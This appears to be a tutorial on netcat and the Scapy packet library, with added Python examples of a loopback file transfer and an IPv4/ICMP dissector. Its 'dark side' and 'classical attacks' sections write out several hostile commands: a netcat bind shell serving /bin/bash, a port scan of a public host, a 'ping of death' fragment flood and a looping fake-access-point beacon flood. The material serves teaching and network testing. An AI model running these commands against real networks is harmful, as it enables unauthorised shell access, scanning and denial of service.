Packet Manipulation with netcat and scapy

Netcat

This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool to use directly or easily drive by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections.

The original Netcat was released by Hobbit in 1995, but it hasn't been maintained despite its popularity. It can sometimes even be hard to find a copy of the v1.10 source code. The flexibility and usefulness of this tool prompted the Nmap Project to produce Ncat, a modern reimplementation which supports SSL, IPv6, SOCKS and HTTP proxies, connection brokering, and more. Other takes on this classic tool include the amazingly versatile Socat, OpenBSD's nc, Cryptcat, Netcat6, pnetcat, SBD, and so-called GNU Netcat.

Latest release: version 1.10 on March 20, 1996 (21 years, 2 months ago).

Simplest usage

$ nc host port

This creates a TCP connection to the given port on the given target host.

Example uses — the light side

To make a chat server

Server

$ nc -l -p 12345

Client

$ nc localhost 12345

-l listen mode (wait for an incoming connection instead of connecting out)

-p local port to listen on

Using Netcat to transfer files

Receiving side (listens and writes what arrives to a file)

$ nc -l -p 12345 -w 10 > file

Sending side (connects and pipes the file in)

$ cat article | nc -w 1 localhost 12345

-w timeout in seconds: on the listener, how long to wait for a connection; on the sender, how long to wait for the connection and for further input before closing
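As an added illustration, not part of the original article and not netcat's own code, here are the two sides of the transfer above re-implemented with plain Python sockets, so the listener (`nc -l -p PORT -w TIMEOUT > file`) and the sender (`cat file | nc -w 1 HOST PORT`) can be run against each other on loopback. The port is chosen at runtime and the payload is constructed; `free_port`, `receive_to_buffer`, `send_bytes`, `transfer_over_localhost` and `listener_gives_up` are names chosen here.

```python
import socket
import threading


def free_port():
    """Ask the kernel for an unused TCP port on loopback (helper for the demo)."""
    with socket.socket() as probe:
        probe.bind(("127.0.0.1", 0))
        return probe.getsockname()[1]


def receive_to_buffer(port, timeout=10.0, ready=None):
    """The listening side, nc -l -p PORT -w TIMEOUT > file: accept one
    connection, read until the peer closes it, return every byte received.
    -w here means: give up (socket.timeout) if nobody connects in time."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    srv.settimeout(timeout)
    if ready is not None:
        ready.set()                 # tell the sender it may connect now
    try:
        conn, _ = srv.accept()
    finally:
        srv.close()                 # one connection only, like nc -l
    chunks = []
    with conn:
        conn.settimeout(timeout)
        while True:
            data = conn.recv(4096)
            if not data:            # peer closed its side: end of "file"
                break
            chunks.append(data)
    return b"".join(chunks)


def send_bytes(host, port, payload, timeout=1.0):
    """The sending side, cat file | nc -w 1 HOST PORT: connect, push the
    bytes, then close our write half so the receiver sees end of file."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)


def transfer_over_localhost(payload):
    """Run listener and sender against each other on loopback and return
    what the listener received (what nc would have written to `file`)."""
    port = free_port()
    ready = threading.Event()
    result = {}

    def listener():
        result["data"] = receive_to_buffer(port, 10.0, ready)

    t = threading.Thread(target=listener)
    t.start()
    ready.wait(5.0)                 # do not connect before listen() is done
    send_bytes("127.0.0.1", port, payload)
    t.join(15.0)
    return result.get("data")


def listener_gives_up(timeout=0.3):
    """True when the listener stops waiting after `timeout` seconds with no
    client at all, which is what -w buys you on the receiving side."""
    try:
        receive_to_buffer(free_port(), timeout=timeout)
    except socket.timeout:
        return True
    return False


if __name__ == "__main__":
    # constructed stand-in for the "article" file piped into nc above
    sample = b"".join(b"line %d of the article\n" % i for i in range(100))
    print(len(transfer_over_localhost(sample)), "bytes received")
    print("listener timed out without a client:", listener_gives_up())
```

Note that everything crosses the wire in clear, exactly as with nc: anyone on the path can read the file, which is why the "when should I use netcat" section below restricts it to trusted internal networks.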

Example uses — the dark side

port scanning

$ nc -v -w 1 -z www.google.com 80-82

-z zero-I/O mode: nc only reports whether each port accepts a connection and neither sends nor receives data

remote shell

$ nc -lp 5000 -e /bin/bash

-e program to execute once a connection occurs (its stdin/stdout are attached to the connection)

Some of netcat’s major features are

  • Outbound or inbound connections, TCP or UDP, to or from any ports
  • Full DNS forward/reverse checking, with appropriate warnings
  • Ability to use any local source port
  • Ability to use any locally-configured network source address
  • Built-in port-scanning capabilities, with randomizer
  • Built-in loose source-routing capability
  • Can read command line arguments from standard input
  • Slow-send mode, one line every N seconds
  • Hex dump of transmitted and received data
  • Optional ability to let another program service established connections
  • Optional telnet-options responder

When should I use netcat?

  • It's unencrypted -> not secure: anything sent can be read or altered on the way
  • Use it only on internal company networks you trust

Scapy

Introduction

Scapy is a Python program that enables the user to send, sniff and dissect and forge network packets. This capability allows construction of tools that can probe, scan or attack networks.

In other words, Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. Scapy can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery. It can replace hping, arpspoof, arp-sk, arping, p0f and even some parts of Nmap, tcpdump, and tshark.

Installation

Scapy v2 > 2.3.3 needs Python 2.7.

To install scapy:

$ pip install scapy

Debian/Ubuntu: just use the standard packages:

$ sudo apt-get install tcpdump graphviz imagemagick python-gnuplot python-cryptography python-pyx

Scapy optionally uses python-cryptography v1.7 or later. It has not been packaged for apt in less recent OS versions (e.g. Debian Jessie). If you need the cryptography-related methods, you may install the library with:

# pip install cryptography

If you need optional software for special features, see
http://scapy.readthedocs.io/en/latest/installation.html#optional-software-for-special-features

How to use it?

Start the interactive shell (root is needed to send and sniff raw packets):

$ sudo scapy

Now we are ready to manipulate packets.
First step: build a packet

>>> a=IP(ttl=10)
>>> a
<IP ttl=10 |>
>>> a.src
'127.0.0.1'
>>> a.dst="www.google.co.th"
>>> a
<IP ttl=10 dst=Net('www.google.co.th') |>
>>> a.src = '10.2.24.139'
>>> a.src
'10.2.24.139'
>>> del(a.ttl)
>>> a
<IP dst=192.168.1.1 |>
>>> a.ttl
64

The / operator is used as a composition operator between two layers: the right-hand layer becomes the payload of the left-hand one, and fields such as proto or type are filled in automatically.

>>> IP()
<IP |>
>>> IP()/TCP()
<IP frag=0 proto=tcp |<TCP |>>
>>> Ether()/IP()/TCP()
<Ether type=0x800 |<IP frag=0 proto=tcp |<TCP |>>>
>>> IP()/TCP()/"GET / HTTP/1.0\r\n\r\n"
<IP frag=0 proto=tcp |<TCP |<Raw load='GET / HTTP/1.0\r\n\r\n' |>>>
>>> Ether()/IP()/IP()/UDP()
<Ether type=0x800 |<IP frag=0 proto=ipencap |<IP frag=0 proto=udp |<UDP |>>>>
>>> IP(proto=55)/TCP()
<IP frag=0 proto=55 |<TCP |>>

We can also go the other way and dissect a raw byte string back into layers by passing it to a layer constructor; in the interactive shell `_` holds the previous result, so `IP(_)` parses the bytes produced by `str(IP())`.

>>> str(IP())
'E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01'
>>> IP(_)
<IP version=4L ihl=5L tos=0x0 len=20 id=1 flags= frag=0L ttl=64 proto=hopopt chksum=0x7ce7 src=127.0.0.1 dst=127.0.0.1 |>
>>> a = Ether()/IP(dst="www.slashdot.org")/TCP()/"GET /index.html HTTP/1.0 \n\n"
>>> hexdump(a)
WARNING: No route found (no default route?)
0000  FF FF FF FF FF FF 00 00 00 00 00 00 08 00 45 00  ..............E.
0010  00 43 00 01 00 00 40 06 ED 61 00 00 00 00 D8 22  .C....@..a....."
0020  B5 30 00 14 00 50 00 00 00 00 00 00 00 00 50 02  .0...P........P.
0030  20 00 30 5F 00 00 47 45 54 20 2F 69 6E 64 65 78   .0_..GET /index
0040  2E 68 74 6D 6C 20 48 54 54 50 2F 31 2E 30 20 0A  .html HTTP/1.0 .
0050  0A                                               .
>>> b=str(a)
WARNING: No route found (no default route?)
>>> b
'\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00C\x00\x01\x00\x00@\x06\xeda\x00\x00\x00\x00\xd8"\xb50\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x000_\x00\x00GET /index.html HTTP/1.0 \n\n'
>>> c=Ether(b)
>>> c
<Ether dst=ff:ff:ff:ff:ff:ff src=00:00:00:00:00:00 type=0x800 |<IP version=4L ihl=5L tos=0x0 len=67 id=1 flags= frag=0L ttl=64 proto=tcp chksum=0xed61 src=0.0.0.0 dst=216.34.181.48 options=[] |<TCP sport=ftp_data dport=http seq=0 ack=0 dataofs=5L reserved=0L flags=S window=8192 chksum=0x305f urgptr=0 options=[] |<Raw load='GET /index.html HTTP/1.0 \n\n' |>>>>

We can generate a graphical dump of a packet as a PDF or PostScript file with PyX.
Install PyX: pip install pyx
Then, for one packet of a captured list (here the one at index 423):

>>> a[423].pdfdump(layer_shift=1)

http://scapy.readthedocs.io/en/latest/_images/isakmp_dump.png

Send and receive packets
In scapy, the send() function sends packets at layer 3 (the kernel adds the Ethernet header and chooses the route) and sendp() sends at layer 2 (you supply the Ethernet header and interface yourself).

>>> send(IP(dst="www.google.com")/ICMP())
>>> sendp(Ether()/IP(dst="www.google.com",ttl=(1,4)), iface="eth1")

sr1() sends packets and returns the first answer. The packets must be layer 3 packets (IP, ARP, etc.). The function srp() does the same for layer 2 packets (Ethernet, 802.3, etc.).
SYN scans

>>> sr1(IP(dst="72.14.207.99")/TCP(dport=80,flags="S"))
<IP version=4L ihl=5L tos=0x20 len=44 id=33529 flags= frag=0L ttl=244
proto=TCP chksum=0x6a34 src=72.14.207.99 dst=192.168.1.100 options=[] |
<TCP sport=www dport=ftp-data seq=2487238601L ack=1 dataofs=6L reserved=0L
flags=SA window=8190 chksum=0xcdc7 urgptr=0 options=[('MSS', 536)] |
<Padding load='V\xf7' |>>>

Sniffing

We can easily capture some packets or even clone tcpdump

>>> sniff(iface="eth1", prn=lambda x: x.show())
###[ Ethernet ]###
  dst       = 00:ae:f3:52:aa:d1
  src       = 00:02:15:37:a2:44
  type      = 0x800
###[ IP ]###
  version   = 4L
  ihl       = 5L
  tos       = 0x0
  len       = 84
  id        = 0
  flags     = DF
  frag      = 0L
  ttl       = 64
  proto     = ICMP
  chksum    = 0x3831
  src       = 192.168.5.21
  dst       = 66.35.250.151
  options   = ''
###[ ICMP ]###
  type      = echo-request
  code      = 0
  chksum    = 0x89d9
  id        = 0xc245
  seq       = 0x0
###[ Raw ]###
  load      = 'B\xf7i\xa9\x00\x04\x149\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\x22#$%&\'()*+,-./01234567'
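To make concrete what Scapy does when it serialises `IP()` to bytes, fills in `chksum`, and then dissects a captured frame for `show()`, here is an added example in plain Python (it is not Scapy's code and does not need Scapy installed). `build_ipv4` reproduces the exact bytes and the 0x7ce7 checksum shown for `str(IP())` above, and `dissect_frame` walks a constructed Ethernet/IP/ICMP echo request with the same addresses as the sniffed packet above and prints it in a `show()`-like layout. The function names, the 56-byte ICMP payload and the frame itself are constructed here; the IP checksum 0x3831 it reports is recomputed from the header and happens to match the sniffed packet because the header fields are the same.

```python
import socket
import struct


def inet_checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words; odd length is zero-padded.
    Over a header whose checksum field is already filled in, the result is 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src="127.0.0.1", dst="127.0.0.1", proto=0, ttl=64, ident=1,
               flags=0, payload=b""):
    """Serialise an IPv4 header with the same defaults Scapy's IP() uses:
    version 4, ihl 5, tos 0, len filled in, id 1, checksum computed."""
    head = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident,
                       flags << 13, ttl, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))
    chk = inet_checksum(head)                # computed with the field zeroed
    return head[:10] + struct.pack("!H", chk) + head[12:] + payload


def dissect_ipv4(data):
    """Parse one IPv4 datagram into a field dict (what IP(_) shows)."""
    (vihl, tos, length, ident, frag, ttl, proto,
     chk, src, dst) = struct.unpack("!BBHHHBBH4s4s", data[:20])
    ihl = (vihl & 0x0F) * 4
    names = ((0x4000, "DF"), (0x2000, "MF"))
    return {
        "version": vihl >> 4, "ihl": ihl, "tos": tos, "len": length,
        "id": ident, "flags": "+".join(n for bit, n in names if frag & bit),
        "frag": frag & 0x1FFF, "ttl": ttl, "proto": proto, "chksum": chk,
        "chksum_ok": inet_checksum(data[:ihl]) == 0,   # recomputed, not trusted
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
        "payload": data[ihl:length],
    }


def mac(raw):
    return ":".join("%02x" % b for b in raw)


def dissect_frame(frame):
    """Return [(layer_name, fields), ...] for Ether / IP / ICMP / Raw."""
    dst, src, etype = struct.unpack("!6s6sH", frame[:14])
    layers = [("Ethernet", {"dst": mac(dst), "src": mac(src), "type": hex(etype)})]
    if etype != 0x0800:                      # only IPv4 is dissected here
        layers.append(("Raw", {"load": frame[14:]}))
        return layers
    ip = dissect_ipv4(frame[14:])
    payload = ip.pop("payload")
    layers.append(("IP", ip))
    if ip["proto"] == 1 and len(payload) >= 8:
        typ, code, chk, ident, seq = struct.unpack("!BBHHH", payload[:8])
        layers.append(("ICMP", {"type": typ, "code": code, "chksum": chk,
                                "chksum_ok": inet_checksum(payload) == 0,
                                "id": ident, "seq": seq}))
        payload = payload[8:]
    if payload:
        layers.append(("Raw", {"load": payload}))
    return layers


def show(layers):
    """Print the layers the way packet.show() lays them out."""
    for name, fields in layers:
        print("###[ %s ]###" % name)
        for key, value in fields.items():
            print("  %-9s = %r" % (key, value))


def sample_echo_request():
    """Constructed echo request using the addresses from the sniffed packet."""
    load = bytes(range(0x08, 0x40))          # 56-byte pattern, constructed
    icmp = struct.pack("!BBHHH", 8, 0, 0, 0xC245, 0)
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp + load)) + icmp[4:] + load
    ip = build_ipv4("192.168.5.21", "66.35.250.151", proto=1, ident=0,
                    flags=2, payload=icmp)   # flags=2 sets DF
    eth = bytes.fromhex("00aef352aad1") + bytes.fromhex("00021537a244")
    return eth + struct.pack("!H", 0x0800) + ip


if __name__ == "__main__":
    print(repr(build_ipv4()))                # the bytes str(IP()) printed above
    show(dissect_frame(sample_echo_request()))
```

The `chksum_ok` fields are the part worth keeping in any dissector you write: a capture tool that recomputes checksums instead of trusting the ones on the wire will flag corrupted or hand-crafted packets that a naive parser would display as normal.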

Routing

Scapy has its own routing table, so your packets can be routed differently than the system's:

Display it with: >>> conf.route

Displaying results as a graph
This needs graphviz. By default, ImageMagick is used to display the graph.
Example

>>> res,unans = traceroute(["www.microsoft.com","www.cisco.com","www.yahoo.com","www.wanadoo.fr","www.pacsec.com"],dport=[80,443],maxttl=20,retry=-2)
Received 190 packets, got 190 answers, remaining 10 packets
   193.252.122.103:443 193.252.122.103:80 198.133.219.25:443 198.133.219.25:80 207.46...
1  192.168.8.1     192.168.8.1     192.168.8.1     192.168.8.1     192.16...
2  82.251.4.254    82.251.4.254    82.251.4.254    82.251.4.254    82.251...
3  213.228.4.254   213.228.4.254   213.228.4.254   213.228.4.254   213.22...
[...]
>>> res.graph()                           # piped to ImageMagick's display program. Image below.
>>> res.graph(type="ps",target="| lp")    # piped to postscript printer
>>> res.graph(target="> /tmp/graph.svg")  # saved to file
http://scapy.readthedocs.io/en/latest/_images/graph_traceroute.png

res.graph() builds a directed graph from all the routes found and clusters the hops by AS.

Classical attacks
Ping of death (Muuahahah):

>>> send( fragment(IP(dst="10.0.0.5")/ICMP()/("X"*60000)) )

Wireless frame injection
Provided that your wireless card and driver are correctly configured for frame injection, create a monitor-mode interface:

$ iw dev wlan0 interface add mon0 type monitor
$ ifconfig mon0 up

Now we can send beacon frames for a kind of fake access point:

>>> sendp(RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2="00:01:02:03:04:05",addr3="00:01:02:03:04:05")/
    Dot11Beacon(cap="ESS", timestamp=1)/
    Dot11Elt(ID="SSID", info=RandString(RandNum(1,50)))/
    Dot11Elt(ID="Rates", info='\x82\x84\x0b\x16')/
    Dot11Elt(ID="DSset", info="\x03")/
    Dot11Elt(ID="TIM", info="\x00\x01\x00\x00"),
    iface="mon0", loop=1)

**Depending on the driver**

To send an IP packet we specify the destination (dst) and stack on it the layer for the protocol we want to use, for example:

>>> send(IP(dst="www.google.co.th")/ICMP())
